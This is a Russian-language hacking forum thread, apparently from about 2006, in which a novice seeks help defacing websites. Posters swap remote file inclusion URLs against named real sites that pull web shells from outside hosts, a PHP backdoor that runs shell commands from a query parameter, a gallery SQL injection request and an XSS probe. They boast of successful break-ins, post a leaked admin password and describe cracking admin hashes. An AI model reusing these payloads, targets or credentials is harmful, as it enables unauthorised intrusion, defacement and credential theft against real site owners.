Никак не получаеться шелл залить,вернее получаеться но както криво,вроде заливка идёт,но ничего не происходит
вот ссылка http://df.md/index.php?act=http://arry1.narod.ru/shell
или http://df.md/index.php?act=http://fordestroy.narod.ru/r57shel,
а если можно и тутор дайте,хочу Дефес зделать вот ..всё вродеб...
спс заранее.

Ps юзал поиск не нарыл ничего,щас в видео бибиотеке гляну.

Не грузится у меня чет ни df.md, ни твои сайты на народе...

странно.... http://www.df.md

Если с шеллом не получится попробуй SQL-запрос выполнить в галерее


GET /cpg/displayimage.php?album=random&cat=0&pos=-{Not Viewd Image ID} HTTP/1.1
Host: адрес сайта
User-Agent: ’sql commands
Keep-Alive: 300
Cookie: твоя сессия

мммм.....http://arry1.narod.ru/shell.php разве не грузиться?

Если с шеллом не получится попробуй SQL-запрос выполнить в галерее


GET /cpg/displayimage.php?album=random&cat=0&pos=-{Not Viewd Image ID} HTTP/1.1
Host: адрес сайта
User-Agent: ’sql commands
Keep-Alive: 300
Cookie: твоя сессия

неа не вышло...но спс за поддержку +1 тебе)

слуш как проверить валидность шела?этого http://arry1.narod.ru/shell
просо думал пчп иньекцию,а потом радмином...

вот ещё нарыл, http://www.grailcoat.com/index.php?p=12 следвательно => http://www.grailcoat.com/index.php?p=http://arry1.narod.ru/1.txt&c=ls%20-l
где 1.тхт :

<?
if (!empty($_GET['c'])) {
echo '<pre>';
system($_GET['c']};
echo '</pre>';
}
exit;
?>

а пишет "parse error" в чём ошибка?

потом ввел http://www.grailcoat.com/index.php?p=http://arry1.narod.ru/shell.php&c=ls%20-l
и ваще какаята бредуха Оо
поможет ктото?

вот ещё нарыл, http://www.grailcoat.com/index.php?p=12 следвательно => http://www.grailcoat.com/index.php?p=http://arry1.narod.ru/1.txt&c=ls%20-l


а пишет "parse error" в чём ошибка?
Да нифига не следовательно!
смотри: http://www.grailcoat.com/index.php?p=%3Cscript%3Ealert()%3C/script%3E
выскакивает алерт, это пасивная xss а ты туда просто ссылку вставляеш! так ничего не получиться!

УРААААААААААААААААААААААА АААА! взломан )))))
ошибку нашел)))))

нет там по другому надо было зделать )))

вот скриники http://slil.ru/23085371 )

чёт http://www.g4.com.tw/index.php?p=http://rst.void.ru/download/r57shell.txt сюда не заливаеться ремвьюв с http://arry1.narod.ru/remview.php Оо
ребята реально помогите ктото,я первый раз пытаюсь чтото взломать (цель дефейс)
и нужна помошь,вспомните себя в начале... плз)
***чтобы не зделал пишет "Доступ запрещён!"

system($_GET['c']};
нетакая скобка system($_GET['c']);

всё нормально инклудить, вот пример с удаленным файлом :
_http://www.grailcoat.com/index.php?p=http://rst.void.ru/download/r57shell.txt =)

по поводу http://www.grailcoat.com/,там редактировать недьзя...,написал в строке выполнить /admin.php там взял пасс (кстати вот он пас от админики сайта юзер grail
пасс grailPASS123 но админка невалидная ))))
ЗЫ: спасибо большое gemaglab1n,единственный чел который помог и обьяснил что к чему)

чё вы бедный http://www.grailcoat.com/ мучаете
вот поиграйтесь с комуняками
http://www.belkprf.ru/news.php?article=http://hrs-xss.narod.ru/shell.php

чё вы бедный http://www.grailcoat.com/ мучаете
вот поиграйтесь с комуняками
http://www.belkprf.ru/news.php?article=http://hrs-xss.narod.ru/shell.php

)))) :D

чё вы бедный http://www.grailcoat.com/ мучаете
вот поиграйтесь с комуняками
http://www.belkprf.ru/news.php?article=http://hrs-xss.narod.ru/shell.php

Не понял прикола.. Залазю на на етот коммунистический сайт - там сейф моде и все такое. Просматриваю несколько папочек и нахожу в home/darlock/public_html/belhouse/sadmin/admin.inc 2 одинаковых хеша, явно логин:пасс к админке сайта (это уже сайт не коммуняк, а про недвижимость). Хеши быстро колются и говорят, что они bel01:bel01.
Ну захожу я в админку, а там вместо админки-то одна надпись: "все ссылки на место!"... :) :) :)

Не понял прикола.. Залазю на на етот коммунистический сайт - там сейф моде и все такое. Просматриваю несколько папочек и нахожу в home/darlock/public_html/belhouse/sadmin/admin.inc 2 одинаковых хеша, явно логин:пасс к админке сайта (это уже сайт не коммуняк, а про недвижимость). Хеши быстро колются и говорят, что они bel01:bel01.
Ну захожу я в админку, а там вместо админки-то одна надпись: "все ссылки на место!"... :) :) :)
даааааааааааааа :( видать сейф мод обходить невозможно
ну это же не мой сайт чё ты надём хош найти??????
базу кред (блин чё за брехня)
или я сбрендил уже кардингом что те просто ссылу дам с кредами?
Радуйся жизни и всё будет уЁЁЁЁЁЁ
вот тока незабывай заповеди!!!!!!!
помни их

Классно было в 2006, каждый второй сайт ломаеться =)

не то что щас...